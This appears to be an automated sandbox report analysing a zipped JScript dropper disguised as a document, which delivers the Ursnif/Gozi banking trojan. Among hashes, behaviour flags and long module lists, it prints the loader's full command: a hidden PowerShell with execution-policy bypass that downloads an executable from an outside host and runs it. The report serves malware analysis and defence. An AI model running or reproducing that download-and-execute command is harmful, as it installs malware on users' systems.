General Info

File name

newdoocument.doc.zip

Full analysis
https://app.any.run/tasks/094758af-defc-4492-a83f-d410f4a24492
Verdict
Malicious activity
Analysis date
4/15/2019, 04:03:38
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

loader

trojan

gozi

ursnif

evasion

dreambot

Indicators:

MIME:
application/zip
File info:
Zip archive data, at least v2.0 to extract
MD5

ab1feb71209a4d65e8b1d831aa9b0660

SHA1

74f125acf09826ef9b558139347be3a7e7cd0053

SHA256

0272e27e87a8fc252f0b578352ae336ca45f7fce0be81739349220734fffaed8

SSDEEP

48:9wH6fwm3sxhDZxesPqHzsIfZw2z2Lqkq4lIGUHtDGC7VM8ZiWcdG:us3snDZxesyHzDwWQjq4lKwZdG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
60 seconds
Additional time used
none
Fakenet option
off
Heavy Evaision option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Connects to CnC server
  • explorer.exe (PID: 252)
Executes PowerShell scripts
  • cmd.exe (PID: 368)
Runs injected code in another process
  • TempoZg18.exe (PID: 3704)
Downloads executable files from the Internet
  • powershell.exe (PID: 4056)
Application was dropped or rewritten from another process
  • TempoZg18.exe (PID: 3704)
Detected URSNIF Trojan
  • TempoZg18.exe (PID: 3704)
URSNIF Shellcode was detected
  • explorer.exe (PID: 252)
Application was injected by another process
  • explorer.exe (PID: 252)
Changes the autorun value in the registry
  • explorer.exe (PID: 252)
Runs Chrome without HTTP2 support
  • explorer.exe (PID: 252)
  • chrome.exe (PID: 4068)
Starts CMD.EXE for commands execution
  • explorer.exe (PID: 252)
  • WScript.exe (PID: 2288)
Checks for external IP
  • nslookup.exe (PID: 2940)
Creates files in the user directory
  • TempoZg18.exe (PID: 3704)
  • powershell.exe (PID: 4056)
Executes scripts
  • WinRAR.exe (PID: 2688)
Executable content was dropped or overwritten
  • powershell.exe (PID: 4056)
Reads settings of System Certificates
  • chrome.exe (PID: 3564)
Application launched itself
  • chrome.exe (PID: 4068)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.zip
|   ZIP compressed archive (100%)
EXIF
ZIP
ZipRequiredVersion:
20
ZipBitFlag:
null
ZipCompression:
Deflated
ZipModifyDate:
2019:04:13 20:46:09
ZipCRC:
0xbdaf35ae
ZipCompressedSize:
2609
ZipUncompressedSize:
9419
ZipFileName:
newdoocument.doc.js

Screenshots

Processes

Total processes
55
Monitored processes
23
Malicious processes
6
Suspicious processes
0

Behavior graph

+
start inject winrar.exe no specs wscript.exe no specs cmd.exe no specs powershell.exe #URSNIF tempozg18.exe no specs #URSNIF explorer.exe cmd.exe no specs nslookup.exe cmd.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
252
CMD
C:\Windows\Explorer.EXE
Path
C:\Windows\explorer.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Windows Explorer
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\explorer.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\shell32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\slc.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\propsys.dll
c:\windows\system32\cryptbase.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\profapi.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\iconcodecservice.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sndvolsso.dll
c:\windows\system32\hid.dll
c:\windows\system32\mmdevapi.dll
c:\windows\system32\timedate.cpl
c:\windows\system32\atl.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\actxprxy.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\userenv.dll
c:\windows\system32\shacct.dll
c:\windows\system32\samlib.dll
c:\windows\system32\samcli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\msftedit.dll
c:\windows\system32\msls31.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\authui.dll
c:\windows\system32\cryptui.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\gameux.dll
c:\windows\system32\xmllite.dll
c:\windows\system32\wer.dll
c:\windows\system32\msiltcfg.dll
c:\windows\system32\version.dll
c:\windows\system32\msi.dll
c:\windows\system32\winsta.dll
c:\windows\system32\psapi.dll
c:\windows\system32\networkexplorer.dll
c:\windows\system32\winmm.dll
c:\windows\system32\wdmaud.drv
c:\windows\system32\ksuser.dll
c:\windows\system32\avrt.dll
c:\windows\system32\audioses.dll
c:\windows\system32\msacm32.drv
c:\windows\system32\msacm32.dll
c:\windows\system32\midimap.dll
c:\windows\system32\stobject.dll
c:\windows\system32\batmeter.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\es.dll
c:\windows\system32\prnfldr.dll
c:\windows\system32\winspool.drv
c:\windows\system32\dxp.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\syncreg.dll
c:\windows\ehome\ehsso.dll
c:\windows\system32\netshell.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\alttab.dll
c:\windows\system32\wpdshserviceobj.dll
c:\windows\system32\portabledevicetypes.dll
c:\windows\system32\portabledeviceapi.dll
c:\program files\filezilla ftp client\fzshellext.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\pnidui.dll
c:\windows\system32\qutil.dll
c:\windows\system32\wevtapi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\mssprxy.dll
c:\windows\system32\npmproxy.dll
c:\windows\system32\wlanapi.dll
c:\windows\system32\wlanutil.dll
c:\windows\system32\wwanapi.dll
c:\windows\system32\wwapi.dll
c:\windows\system32\qagent.dll
c:\windows\system32\srchadmin.dll
c:\windows\system32\sxs.dll
c:\windows\system32\bthprops.cpl
c:\windows\system32\ieframe.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\synccenter.dll
c:\windows\system32\actioncenter.dll
c:\windows\system32\imapi2.dll
c:\windows\system32\hgcpl.dll
c:\windows\system32\provsvc.dll
c:\windows\system32\netprofm.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\fxsst.dll
c:\windows\system32\fxsapi.dll
c:\windows\system32\fxsresm.dll
c:\windows\system32\wscinterop.dll
c:\windows\system32\wscapi.dll
c:\windows\system32\wscui.cpl
c:\windows\system32\werconcpl.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wercplsupport.dll
c:\windows\system32\msxml6.dll
c:\windows\system32\hcproviders.dll
c:\program files\internet explorer\ieproxy.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\searchfolder.dll
c:\windows\system32\structuredquery.dll
c:\windows\system32\naturallanguage6.dll
c:\windows\system32\nlsdata0009.dll
c:\windows\system32\nlslexicons0009.dll
c:\windows\system32\thumbcache.dll
c:\windows\system32\tquery.dll
c:\program files\microsoft office\office14\onfilter.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll
c:\windows\system32\devrtl.dll
c:\windows\system32\winanr.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\program files\winrar\winrar.exe
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\credssp.dll
c:\windows\system32\wship6.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\msoeacct.dll
c:\windows\system32\msoert2.dll
c:\windows\system32\inetcomm.dll
c:\windows\system32\inetres.dll
c:\windows\system32\acctres.dll
c:\windows\system32\msxml3.dll
c:\program files\common files\system\wab32.dll
c:\windows\system32\cryptdlg.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\msimg32.dll
c:\program files\google\chrome\application\chrome.exe

PID
2688
CMD
"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\newdoocument.doc.zip"
Path
C:\Program Files\WinRAR\WinRAR.exe
Indicators
No indicators
Parent process
explorer.exe
User
admin
Integrity Level
MEDIUM
Version:
Company
Alexander Roshal
Description
WinRAR archiver
Version
5.60.0
Modules
Image
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\uxtheme.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\api-ms-win-core-synch-l1-2-0.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\riched20.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ehstorshell.dll
c:\windows\system32\cscui.dll
c:\windows\system32\cscdll.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\slc.dll
c:\windows\system32\imageres.dll
c:\windows\system32\mpr.dll
c:\windows\system32\drprov.dll
c:\windows\system32\winsta.dll
c:\windows\system32\ntlanman.dll
c:\windows\system32\davclnt.dll
c:\windows\system32\davhlpr.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\netutils.dll
c:\windows\system32\wpdshext.dll
c:\windows\system32\winmm.dll
c:\windows\system32\portabledeviceapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\audiodev.dll
c:\windows\system32\wmvcore.dll
c:\windows\system32\wmasf.dll
c:\windows\system32\ehstorapi.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\samcli.dll
c:\windows\system32\samlib.dll
c:\windows\system32\profapi.dll
c:\windows\system32\wshext.dll
c:\windows\system32\wscript.exe
c:\windows\system32\explorerframe.dll
c:\windows\system32\duser.dll
c:\windows\system32\dui70.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll

PID
2288
CMD
"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\Rar$DIa2688.34301\newdoocument.doc.js"
Path
C:\Windows\System32\WScript.exe
Indicators
No indicators
Parent process
WinRAR.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft ® Windows Based Script Host
Version
5.8.7600.16385
Modules
Image
c:\windows\system32\wscript.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sxs.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\jscript.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\msisip.dll
c:\windows\system32\wshext.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\scrobj.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\propsys.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\psapi.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
368
CMD
"C:\Windows\System32\cmd.exe" /c WZyogGXBYAVORlS & p^owEr^she^lL.e^Xe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','%temp%oZg18.exe'); & start %temp%oZg18.exe & oRpKVOlCIauTiPD
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
WScript.exe
User
admin
Integrity Level
MEDIUM
Exit code
1
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\users\admin\appdata\local\tempozg18.exe

PID
4056
CMD
powErshelL.eXe -executionpolicy bypass -noprofile -w hidden $var = New-Object System.Net.WebClient; $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://instant-payments.ru/read.exe','C:\Users\admin\AppData\Local\TempoZg18.exe');
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\netutils.dll

PID
3704
CMD
C:\Users\admin\AppData\Local\TempoZg18.exe
Path
C:\Users\admin\AppData\Local\TempoZg18.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Description
Version
Modules
Image
c:\users\admin\appdata\local\tempozg18.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msimg32.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\msvcr100.dll

PID
3052
CMD
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\admin\AppData\Local\Temp\B3F2.bi1"
Path
C:\Windows\system32\cmd.exe
Indicators
No indicators
Parent process
explorer.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\nslookup.exe

PID
2940
CMD
nslookup myip.opendns.com resolver1.opendns.com
Path
C:\Windows\system32\nslookup.exe
Indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
nslookup
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\nslookup.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\wsock32.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\napinsp.dll
c:\windows\system32\pnrpnsp.dll
c:\windows\system32\winrnr.dll
c:\windows\system32\wship6.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasadhlp.dll
